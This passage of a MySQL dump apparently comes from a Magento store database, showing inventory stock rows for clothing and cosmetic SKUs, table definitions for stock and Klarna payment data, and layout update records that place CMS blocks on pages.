(1779, 'default', 'WT06-L-Yellow', 100.0000, 1),
(1780, 'default', 'WT06-XL-Blue', 100.0000, 1),
(1781, 'default', 'WT06-XL-Red', 100.0000, 1),
(1782, 'default', 'WT06-XL-Yellow', 100.0000, 1),
(1783, 'default', 'WT06', 0.0000, 1),
(1784, 'default', 'WT07-XS-Green', 100.0000, 1),
(1785, 'default', 'WT07-XS-White', 100.0000, 1),
(1786, 'default', 'WT07-XS-Yellow', 100.0000, 1),
(1787, 'default', 'WT07-S-Green', 100.0000, 1),
(1788, 'default', 'WT07-S-White', 100.0000, 1),
(1789, 'default', 'WT07-S-Yellow', 100.0000, 1),
(1790, 'default', 'WT07-M-Green', 100.0000, 1),
(1791, 'default', 'WT07-M-White', 100.0000, 1),
(1792, 'default', 'WT07-M-Yellow', 100.0000, 1),
(1793, 'default', 'WT07-L-Green', 100.0000, 1),
(1794, 'default', 'WT07-L-White', 100.0000, 1),
(1795, 'default', 'WT07-L-Yellow', 100.0000, 1),
(1796, 'default', 'WT07-XL-Green', 100.0000, 1),
(1797, 'default', 'WT07-XL-White', 100.0000, 1),
(1798, 'default', 'WT07-XL-Yellow', 100.0000, 1),
(1799, 'default', 'WT07', 0.0000, 1),
(1800, 'default', 'WT08-XS-Black', 100.0000, 1),
(1801, 'default', 'WT08-XS-Purple', 100.0000, 1),
(1802, 'default', 'WT08-XS-Yellow', 100.0000, 1),
(1803, 'default', 'WT08-S-Black', 100.0000, 1),
(1804, 'default', 'WT08-S-Purple', 100.0000, 1),
(1805, 'default', 'WT08-S-Yellow', 100.0000, 1),
(1806, 'default', 'WT08-M-Black', 100.0000, 1),
(1807, 'default', 'WT08-M-Purple', 100.0000, 1),
(1808, 'default', 'WT08-M-Yellow', 100.0000, 1),
(1809, 'default', 'WT08-L-Black', 100.0000, 1),
(1810, 'default', 'WT08-L-Purple', 100.0000, 1),
(1811, 'default', 'WT08-L-Yellow', 100.0000, 1),
(1812, 'default', 'WT08-XL-Black', 100.0000, 1),
(1813, 'default', 'WT08-XL-Purple', 100.0000, 1),
(1814, 'default', 'WT08-XL-Yellow', 100.0000, 1),
(1815, 'default', 'WT08', 0.0000, 1),
(1816, 'default', 'WT09-XS-Purple', 100.0000, 1),
(1817, 'default', 'WT09-XS-White', 100.0000, 1),
(1818, 'default', 'WT09-XS-Yellow', 100.0000, 1),
(1819, 'default', 'WT09-S-Purple', 100.0000, 1),
(1820, 'default', 'WT09-S-White', 100.0000, 1),
(1821, 'default', 'WT09-S-Yellow', 100.0000, 1),
(1822, 'default', 'WT09-M-Purple', 100.0000, 1),
(1823, 'default', 'WT09-M-White', 100.0000, 1),
(1824, 'default', 'WT09-M-Yellow', 100.0000, 1),
(1825, 'default', 'WT09-L-Purple', 100.0000, 1),
(1826, 'default', 'WT09-L-White', 100.0000, 1),
(1827, 'default', 'WT09-L-Yellow', 100.0000, 1),
(1828, 'default', 'WT09-XL-Purple', 100.0000, 1),
(1829, 'default', 'WT09-XL-White', 100.0000, 1),
(1830, 'default', 'WT09-XL-Yellow', 100.0000, 1),
(1831, 'default', 'WT09', 0.0000, 1),
(1832, 'default', 'WP01-28-Black', 100.0000, 1),
(1833, 'default', 'WP01-28-Gray', 100.0000, 1),
(1834, 'default', 'WP01-28-White', 100.0000, 1),
(1835, 'default', 'WP01-29-Black', 100.0000, 1),
(1836, 'default', 'WP01-29-Gray', 100.0000, 1),
(1837, 'default', 'WP01-29-White', 100.0000, 1),
(1838, 'default', 'WP01', 0.0000, 1),
(1839, 'default', 'WP02-28-Blue', 100.0000, 1),
(1840, 'default', 'WP02-28-Purple', 100.0000, 1),
(1841, 'default', 'WP02-28-Red', 100.0000, 1),
(1842, 'default', 'WP02-29-Blue', 100.0000, 1),
(1843, 'default', 'WP02-29-Purple', 100.0000, 1),
(1844, 'default', 'WP02-29-Red', 100.0000, 1),
(1845, 'default', 'WP02', 0.0000, 1),
(1846, 'default', 'WP03-28-Black', 100.0000, 1),
(1847, 'default', 'WP03-28-Blue', 100.0000, 1),
(1848, 'default', 'WP03-28-Purple', 100.0000, 1),
(1849, 'default', 'WP03-29-Black', 100.0000, 1),
(1850, 'default', 'WP03-29-Blue', 100.0000, 1),
(1851, 'default', 'WP03-29-Purple', 100.0000, 1),
(1852, 'default', 'WP03', 0.0000, 1),
(1853, 'default', 'WP04-28-Black', 100.0000, 1),
(1854, 'default', 'WP04-28-Blue', 100.0000, 1),
(1855, 'default', 'WP04-28-White', 100.0000, 1),
(1856, 'default', 'WP04-29-Black', 100.0000, 1),
(1857, 'default', 'WP04-29-Blue', 100.0000, 1),
(1858, 'default', 'WP04-29-White', 100.0000, 1),
(1859, 'default', 'WP04', 0.0000, 1),
(1860, 'default', 'WP05-28-Blue', 100.0000, 1),
(1861, 'default', 'WP05-28-Gray', 100.0000, 1),
(1862, 'default', 'WP05-28-Red', 100.0000, 1),
(1863, 'default', 'WP05-29-Blue', 100.0000, 1),
(1864, 'default', 'WP05-29-Gray', 100.0000, 1),
(1865, 'default', 'WP05-29-Red', 100.0000, 1),
(1866, 'default', 'WP05', 0.0000, 1),
(1867, 'default', 'WP06-28-Black', 100.0000, 1),
(1868, 'default', 'WP06-28-Blue', 100.0000, 1),
(1869, 'default', 'WP06-28-Orange', 100.0000, 1),
(1870, 'default', 'WP06-29-Black', 100.0000, 1),
(1871, 'default', 'WP06-29-Blue', 100.0000, 1),
(1872, 'default', 'WP06-29-Orange', 100.0000, 1),
(1873, 'default', 'WP06', 0.0000, 1),
(1874, 'default', 'WP07-28-Black', 100.0000, 1),
(1875, 'default', 'WP07-28-Blue', 100.0000, 1),
(1876, 'default', 'WP07-28-Orange', 100.0000, 1),
(1877, 'default', 'WP07-29-Black', 100.0000, 1),
(1878, 'default', 'WP07-29-Blue', 100.0000, 1),
(1879, 'default', 'WP07-29-Orange', 100.0000, 1),
(1880, 'default', 'WP07', 0.0000, 1),
(1881, 'default', 'WP08-28-Black', 100.0000, 1),
(1882, 'default', 'WP08-28-Green', 100.0000, 1),
(1883, 'default', 'WP08-28-Red', 100.0000, 1),
(1884, 'default', 'WP08-29-Black', 100.0000, 1),
(1885, 'default', 'WP08-29-Green', 100.0000, 1),
(1886, 'default', 'WP08-29-Red', 100.0000, 1),
(1887, 'default', 'WP08', 0.0000, 1),
(1888, 'default', 'WP09-28-Black', 100.0000, 1),
(1889, 'default', 'WP09-28-Blue', 100.0000, 1),
(1890, 'default', 'WP09-28-Purple', 100.0000, 1),
(1891, 'default', 'WP09-29-Black', 100.0000, 1),
(1892, 'default', 'WP09-29-Blue', 100.0000, 1),
(1893, 'default', 'WP09-29-Purple', 100.0000, 1),
(1894, 'default', 'WP09', 0.0000, 1),
(1895, 'default', 'WP10-28-Black', 100.0000, 1),
(1896, 'default', 'WP10-28-Gray', 100.0000, 1),
(1897, 'default', 'WP10-28-White', 100.0000, 1),
(1898, 'default', 'WP10-29-Black', 100.0000, 1),
(1899, 'default', 'WP10-29-Gray', 100.0000, 1),
(1900, 'default', 'WP10-29-White', 100.0000, 1),
(1901, 'default', 'WP10', 0.0000, 1),
(1902, 'default', 'WP11-28-Blue', 100.0000, 1),
(1903, 'default', 'WP11-28-Green', 100.0000, 1),
(1904, 'default', 'WP11-28-Red', 100.0000, 1),
(1905, 'default', 'WP11-29-Blue', 100.0000, 1),
(1906, 'default', 'WP11-29-Green', 100.0000, 1),
(1907, 'default', 'WP11-29-Red', 100.0000, 1),
(1908, 'default', 'WP11', 0.0000, 1),
(1909, 'default', 'WP12-28-Blue', 100.0000, 1),
(1910, 'default', 'WP12-28-Gray', 100.0000, 1),
(1911, 'default', 'WP12-28-Green', 100.0000, 1),
(1912, 'default', 'WP12-29-Blue', 100.0000, 1),
(1913, 'default', 'WP12-29-Gray', 100.0000, 1),
(1914, 'default', 'WP12-29-Green', 100.0000, 1),
(1915, 'default', 'WP12', 0.0000, 1),
(1916, 'default', 'WP13-28-Blue', 100.0000, 1),
(1917, 'default', 'WP13-28-Green', 100.0000, 1),
(1918, 'default', 'WP13-28-Orange', 100.0000, 1),
(1919, 'default', 'WP13-29-Blue', 100.0000, 1),
(1920, 'default', 'WP13-29-Green', 100.0000, 1),
(1921, 'default', 'WP13-29-Orange', 100.0000, 1),
(1922, 'default', 'WP13', 0.0000, 1),
(1923, 'default', 'WSH01-28-Black', 100.0000, 1),
(1924, 'default', 'WSH01-28-Green', 100.0000, 1),
(1925, 'default', 'WSH01-28-Red', 100.0000, 1),
(1926, 'default', 'WSH01-29-Black', 100.0000, 1),
(1927, 'default', 'WSH01-29-Green', 100.0000, 1),
(1928, 'default', 'WSH01-29-Red', 100.0000, 1),
(1929, 'default', 'WSH01-30-Black', 100.0000, 1),
(1930, 'default', 'WSH01-30-Green', 100.0000, 1),
(1931, 'default', 'WSH01-30-Red', 100.0000, 1),
(1932, 'default', 'WSH01-31-Black', 100.0000, 1),
(1933, 'default', 'WSH01-31-Green', 100.0000, 1),
(1934, 'default', 'WSH01-31-Red', 100.0000, 1),
(1935, 'default', 'WSH01-32-Black', 100.0000, 1),
(1936, 'default', 'WSH01-32-Green', 100.0000, 1),
(1937, 'default', 'WSH01-32-Red', 100.0000, 1),
(1938, 'default', 'WSH01', 0.0000, 1),
(1939, 'default', 'WSH02-28-Gray', 100.0000, 1),
(1940, 'default', 'WSH02-28-Orange', 100.0000, 1),
(1941, 'default', 'WSH02-28-Yellow', 100.0000, 1),
(1942, 'default', 'WSH02-29-Gray', 100.0000, 1),
(1943, 'default', 'WSH02-29-Orange', 100.0000, 1),
(1944, 'default', 'WSH02-29-Yellow', 100.0000, 1),
(1945, 'default', 'WSH02-30-Gray', 100.0000, 1),
(1946, 'default', 'WSH02-30-Orange', 100.0000, 1),
(1947, 'default', 'WSH02-30-Yellow', 100.0000, 1),
(1948, 'default', 'WSH02-31-Gray', 100.0000, 1),
(1949, 'default', 'WSH02-31-Orange', 100.0000, 1),
(1950, 'default', 'WSH02-31-Yellow', 100.0000, 1),
(1951, 'default', 'WSH02-32-Gray', 100.0000, 1),
(1952, 'default', 'WSH02-32-Orange', 100.0000, 1),
(1953, 'default', 'WSH02-32-Yellow', 100.0000, 1),
(1954, 'default', 'WSH02', 0.0000, 1),
(1955, 'default', 'WSH03-28-Blue', 100.0000, 1),
(1956, 'default', 'WSH03-28-Gray', 100.0000, 1),
(1957, 'default', 'WSH03-28-Orange', 100.0000, 1),
(1958, 'default', 'WSH03-29-Blue', 100.0000, 1),
(1959, 'default', 'WSH03-29-Gray', 100.0000, 1),
(1960, 'default', 'WSH03-29-Orange', 100.0000, 1),
(1961, 'default', 'WSH03-30-Blue', 100.0000, 1),
(1962, 'default', 'WSH03-30-Gray', 100.0000, 1),
(1963, 'default', 'WSH03-30-Orange', 100.0000, 1),
(1964, 'default', 'WSH03-31-Blue', 100.0000, 1),
(1965, 'default', 'WSH03-31-Gray', 100.0000, 1),
(1966, 'default', 'WSH03-31-Orange', 100.0000, 1),
(1967, 'default', 'WSH03-32-Blue', 100.0000, 1),
(1968, 'default', 'WSH03-32-Gray', 100.0000, 1),
(1969, 'default', 'WSH03-32-Orange', 100.0000, 1),
(1970, 'default', 'WSH03', 0.0000, 1),
(1971, 'default', 'WSH04-28-Black', 100.0000, 1),
(1972, 'default', 'WSH04-28-Green', 100.0000, 1),
(1973, 'default', 'WSH04-28-Orange', 100.0000, 1),
(1974, 'default', 'WSH04-29-Black', 100.0000, 1),
(1975, 'default', 'WSH04-29-Green', 100.0000, 1),
(1976, 'default', 'WSH04-29-Orange', 100.0000, 1),
(1977, 'default', 'WSH04-30-Black', 100.0000, 1),
(1978, 'default', 'WSH04-30-Green', 100.0000, 1),
(1979, 'default', 'WSH04-30-Orange', 100.0000, 1),
(1980, 'default', 'WSH04-31-Black', 100.0000, 1),
(1981, 'default', 'WSH04-31-Green', 100.0000, 1),
(1982, 'default', 'WSH04-31-Orange', 100.0000, 1),
(1983, 'default', 'WSH04-32-Black', 100.0000, 1),
(1984, 'default', 'WSH04-32-Green', 100.0000, 1),
(1985, 'default', 'WSH04-32-Orange', 100.0000, 1),
(1986, 'default', 'WSH04', 0.0000, 1),
(1987, 'default', 'WSH05-28-Blue', 100.0000, 1),
(1988, 'default', 'WSH05-28-Purple', 100.0000, 1),
(1989, 'default', 'WSH05-28-Yellow', 100.0000, 1),
(1990, 'default', 'WSH05-29-Blue', 100.0000, 1),
(1991, 'default', 'WSH05-29-Purple', 100.0000, 1),
(1992, 'default', 'WSH05-29-Yellow', 100.0000, 1),
(1993, 'default', 'WSH05-30-Blue', 100.0000, 1),
(1994, 'default', 'WSH05-30-Purple', 100.0000, 1),
(1995, 'default', 'WSH05-30-Yellow', 100.0000, 1),
(1996, 'default', 'WSH05-31-Blue', 100.0000, 1),
(1997, 'default', 'WSH05-31-Purple', 100.0000, 1),
(1998, 'default', 'WSH05-31-Yellow', 100.0000, 1),
(1999, 'default', 'WSH05-32-Blue', 100.0000, 1),
(2000, 'default', 'WSH05-32-Purple', 100.0000, 1),
(2001, 'default', 'WSH05-32-Yellow', 100.0000, 1),
(2002, 'default', 'WSH05', 0.0000, 1),
(2003, 'default', 'WSH06-28-Gray', 100.0000, 1),
(2004, 'default', 'WSH06-28-Orange', 100.0000, 1),
(2005, 'default', 'WSH06-28-Purple', 100.0000, 1),
(2006, 'default', 'WSH06-29-Gray', 100.0000, 1),
(2007, 'default', 'WSH06-29-Orange', 100.0000, 1),
(2008, 'default', 'WSH06-29-Purple', 100.0000, 1),
(2009, 'default', 'WSH06', 0.0000, 1),
(2010, 'default', 'WSH07-28-Black', 100.0000, 1),
(2011, 'default', 'WSH07-28-Blue', 100.0000, 1),
(2012, 'default', 'WSH07-28-Purple', 100.0000, 1),
(2013, 'default', 'WSH07-29-Black', 100.0000, 1),
(2014, 'default', 'WSH07-29-Blue', 100.0000, 1),
(2015, 'default', 'WSH07-29-Purple', 100.0000, 1),
(2016, 'default', 'WSH07', 0.0000, 1),
(2017, 'default', 'WSH08-28-Purple', 100.0000, 1),
(2018, 'default', 'WSH08-29-Purple', 100.0000, 1),
(2019, 'default', 'WSH08-30-Purple', 100.0000, 1),
(2020, 'default', 'WSH08-31-Purple', 100.0000, 1),
(2021, 'default', 'WSH08-32-Purple', 100.0000, 1),
(2022, 'default', 'WSH08', 0.0000, 1),
(2023, 'default', 'WSH09-28-Gray', 100.0000, 1),
(2024, 'default', 'WSH09-28-Green', 100.0000, 1),
(2025, 'default', 'WSH09-28-White', 100.0000, 1),
(2026, 'default', 'WSH09-29-Gray', 100.0000, 1),
(2027, 'default', 'WSH09-29-Green', 100.0000, 1),
(2028, 'default', 'WSH09-29-White', 100.0000, 1),
(2029, 'default', 'WSH09', 0.0000, 1),
(2030, 'default', 'WSH10-28-Black', 100.0000, 1),
(2031, 'default', 'WSH10-28-Orange', 100.0000, 1),
(2032, 'default', 'WSH10-28-White', 100.0000, 1),
(2033, 'default', 'WSH10-29-Black', 100.0000, 1),
(2034, 'default', 'WSH10-29-Orange', 100.0000, 1),
(2035, 'default', 'WSH10-29-White', 100.0000, 1),
(2036, 'default', 'WSH10', 0.0000, 1),
(2037, 'default', 'WSH11-28-Blue', 100.0000, 1),
(2038, 'default', 'WSH11-28-Orange', 100.0000, 1),
(2039, 'default', 'WSH11-28-Red', 100.0000, 1),
(2040, 'default', 'WSH11-29-Blue', 100.0000, 1),
(2041, 'default', 'WSH11-29-Orange', 100.0000, 1),
(2042, 'default', 'WSH11-29-Red', 100.0000, 1),
(2043, 'default', 'WSH11', 0.0000, 1),
(2044, 'default', 'WSH12-28-Green', 100.0000, 1),
(2045, 'default', 'WSH12-28-Purple', 100.0000, 1),
(2046, 'default', 'WSH12-28-Red', 100.0000, 1),
(2047, 'default', 'WSH12-29-Green', 100.0000, 1),
(2048, 'default', 'WSH12-29-Purple', 100.0000, 1),
(2049, 'default', 'WSH12-29-Red', 100.0000, 1),
(2050, 'default', 'WSH12-30-Green', 100.0000, 1),
(2051, 'default', 'WSH12-30-Purple', 100.0000, 1),
(2052, 'default', 'WSH12-30-Red', 100.0000, 1),
(2053, 'default', 'WSH12-31-Green', 100.0000, 1),
(2054, 'default', 'WSH12-31-Purple', 100.0000, 1),
(2055, 'default', 'WSH12-31-Red', 100.0000, 1),
(2056, 'default', 'WSH12-32-Green', 100.0000, 1),
(2057, 'default', 'WSH12-32-Purple', 100.0000, 1),
(2058, 'default', 'WSH12-32-Red', 100.0000, 1),
(2059, 'default', 'WSH12', 0.0000, 1),
(2060, 'default', 'EC-416', 22.0000, 1),
(2062, 'default', 'FF44', 22.0000, 1),
(2064, 'default', 'fff55r', 32.0000, 1),
(2068, 'default', 'FF45', 32.0000, 1),
(2071, 'default', 'GGGDF44', 0.0000, 0),
(2072, 'default', 'RAMY SPOT LESS FAIRNESS CREAM', 32.0000, 1),
(2078, 'default', 'HGF64', 32.0000, 1),
(2084, 'default', 'GH786', 34.0000, 1),
(2088, 'default', 'Ramy Spot Cleaner Cream', 65.0000, 1),
(2094, 'default', 'DD53', 43.0000, 0),
(2099, 'default', 'DD53g', 43.0000, 1),
(2101, 'default', 'Ramy Mesta Guard Face', 53.0000, 1),
(2102, 'default', 'New Spot', 5.0000, 1);

-- --------------------------------------------------------

--
-- Table structure for table `inventory_source_stock_link`
--

CREATE TABLE `inventory_source_stock_link` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `stock_id` int(10) UNSIGNED NOT NULL,
  `source_code` varchar(255) NOT NULL,
  `priority` smallint(5) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `inventory_source_stock_link`
--

INSERT INTO `inventory_source_stock_link` (`link_id`, `stock_id`, `source_code`, `priority`) VALUES
(1, 1, 'default', 1);

-- --------------------------------------------------------

--
-- Table structure for table `inventory_stock`
--

CREATE TABLE `inventory_stock` (
  `stock_id` int(10) UNSIGNED NOT NULL,
  `name` varchar(255) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `inventory_stock`
--

INSERT INTO `inventory_stock` (`stock_id`, `name`) VALUES
(1, 'Default Stock');

-- --------------------------------------------------------

--
-- Stand-in structure for view `inventory_stock_1`
-- (See below for the actual view)
--
CREATE TABLE `inventory_stock_1` (
`product_id` int(10) unsigned
,`website_id` smallint(5) unsigned
,`stock_id` smallint(5) unsigned
,`quantity` decimal(12,4)
,`is_salable` smallint(5) unsigned
,`sku` varchar(64)
);

-- --------------------------------------------------------

--
-- Table structure for table `inventory_stock_sales_channel`
--

CREATE TABLE `inventory_stock_sales_channel` (
  `type` varchar(64) NOT NULL,
  `code` varchar(64) NOT NULL,
  `stock_id` int(10) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `inventory_stock_sales_channel`
--

INSERT INTO `inventory_stock_sales_channel` (`type`, `code`, `stock_id`) VALUES
('website', 'base', 1);

-- --------------------------------------------------------

--
-- Table structure for table `klarna_core_order`
--

CREATE TABLE `klarna_core_order` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Entity Id',
  `klarna_order_id` varchar(255) DEFAULT NULL COMMENT 'Klarna Order Id',
  `session_id` varchar(255) DEFAULT NULL COMMENT 'Session Id',
  `reservation_id` varchar(255) DEFAULT NULL COMMENT 'Reservation Id',
  `order_id` int(10) UNSIGNED NOT NULL COMMENT 'Order Id',
  `is_acknowledged` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Is Acknowledged'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Klarna Order';

-- --------------------------------------------------------

--
-- Table structure for table `klarna_payments_quote`
--

CREATE TABLE `klarna_payments_quote` (
  `payments_quote_id` int(10) UNSIGNED NOT NULL COMMENT 'Payments Id',
  `session_id` varchar(255) DEFAULT NULL COMMENT 'Klarna Session Id',
  `client_token` text DEFAULT NULL COMMENT 'Klarna Client Token',
  `authorization_token` varchar(255) DEFAULT NULL COMMENT 'Authorization Token',
  `is_active` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Is Active',
  `quote_id` int(10) UNSIGNED NOT NULL COMMENT 'Quote Id',
  `payment_methods` varchar(255) DEFAULT NULL COMMENT 'Payment Method Categories',
  `payment_method_info` text DEFAULT NULL COMMENT 'Payment Method Category Info'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Klarna Payments Quote';

-- --------------------------------------------------------

--
-- Table structure for table `layout_link`
--

CREATE TABLE `layout_link` (
  `layout_link_id` int(10) UNSIGNED NOT NULL COMMENT 'Link ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `theme_id` int(10) UNSIGNED NOT NULL COMMENT 'Theme ID',
  `layout_update_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Layout Update ID',
  `is_temporary` tinyint(1) NOT NULL DEFAULT 0 COMMENT 'Defines whether Layout Update is Temporary'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Layout Link';

--
-- Dumping data for table `layout_link`
--

INSERT INTO `layout_link` (`layout_link_id`, `store_id`, `theme_id`, `layout_update_id`, `is_temporary`) VALUES
(9, 0, 3, 9, 0),
(10, 0, 3, 10, 0),
(11, 0, 3, 11, 0),
(12, 0, 3, 12, 0),
(13, 0, 3, 13, 0),
(14, 0, 3, 14, 0),
(15, 0, 3, 15, 0),
(16, 0, 3, 16, 0),
(17, 0, 3, 17, 0),
(18, 0, 3, 18, 0),
(19, 0, 3, 19, 0),
(20, 0, 3, 20, 0),
(21, 0, 3, 21, 0),
(22, 0, 3, 22, 0),
(23, 0, 3, 23, 0),
(24, 0, 3, 24, 0),
(25, 0, 3, 25, 0),
(26, 0, 3, 26, 0),
(1, 0, 4, 1, 0),
(2, 0, 4, 2, 0),
(3, 0, 4, 3, 0),
(4, 0, 4, 4, 0),
(5, 0, 4, 5, 0),
(6, 0, 4, 6, 0),
(7, 0, 4, 7, 0),
(8, 0, 4, 8, 0);

-- --------------------------------------------------------

--
-- Table structure for table `layout_update`
--

CREATE TABLE `layout_update` (
  `layout_update_id` int(10) UNSIGNED NOT NULL COMMENT 'Layout Update ID',
  `handle` varchar(255) DEFAULT NULL COMMENT 'Handle',
  `xml` text DEFAULT NULL COMMENT 'Xml',
  `sort_order` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Sort Order',
  `updated_at` timestamp NULL DEFAULT '0000-00-00 00:00:00' ON UPDATE current_timestamp() COMMENT 'Last Update Timestamp'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Layout Updates';

--
-- Dumping data for table `layout_update`
--

INSERT INTO `layout_update` (`layout_update_id`, `handle`, `xml`, `sort_order`, `updated_at`) VALUES
(1, 'cms_index_index', '<body><referenceContainer name=\"page.bottom\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"EzTkwtCv4TuIK6KkbJFtuLmKjgzKtVT6\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">4</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(2, 'cms_index_index', '<body><referenceContainer name=\"content\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"enVnoqjl1OtfLZ81J9LJCJYNB1qws88f\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">6</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(3, 'cms_index_index', '<body><referenceContainer name=\"content\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"DYcam8Qb0fPPP90Ur64CMPXqUgquNNDl\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">7</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(4, 'cms_index_index', '<body><referenceContainer name=\"content\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"qW2dSKWYfihhxn4JVihziw2Jdvs6tqLe\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">5</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(5, 'default', '<body><referenceContainer name=\"footer\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"n6xKYDIHkTZmjNksU5QNnfJBOjYGlUAZ\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">8</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(6, 'cms_index_index', '<body><referenceContainer name=\"content\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"yRY5Bhk3NdkLxHpGsdvW7SHlKUIzHHvY\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">9</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(7, 'cms_index_index', '<body><referenceContainer name=\"content\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"6KJYi6veKvcE2wZy3UREQen6GV7GeLDN\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">10</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(8, 'cms_index_index', '<body><referenceContainer name=\"content\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"iGlGxp291J4LCytj9IFlanHcXIbt4Xpp\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">11</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(9, 'contact_index_index', '<body><referenceContainer name=\"content.top\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"D8bNBUMP9IbBIIvnJcz1SLU2vAgL2NNn\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">13</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(10, 'default', '<body><referenceContainer name=\"cms_footer_links_container\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"MdfM3cFKpJjowQRNykubKp0qYTZnPhsJ\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">12</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(11, 'catalog_category_view_id_42', '<body><referenceContainer name=\"sidebar.main\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"MUymtdR4TMEj7e15ImzSuY5jTolhzGMw\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">14</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(12, 'catalog_category_view_id_8', '<body><referenceContainer name=\"sidebar.main\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"AOKRWUSkpPKcGiRmT9rgYulxxGCco5Da\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">15</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(13, 'catalog_category_view_id_16', '<body><referenceContainer name=\"sidebar.main\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"KYuDFRXm2YncQJsmyW6ibtd6gok6KzPM\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">16</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(14, 'catalog_category_view_id_25', '<body><referenceContainer name=\"sidebar.main\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"dJZ4d9ox0ySQLJcWeOrHxW5dPrkstA8w\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">17</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(15, 'catalog_category_view_id_43', '<body><referenceContainer name=\"sidebar.main\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"WYgfGwe4po28ZKaLaHUNv2No6haQcCyC\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">18</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(16, 'catalog_category_view_id_25', '<body><referenceContainer name=\"content.top\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"c87XefOrIt8GhIStnclgMduUKgShcQje\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">19</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
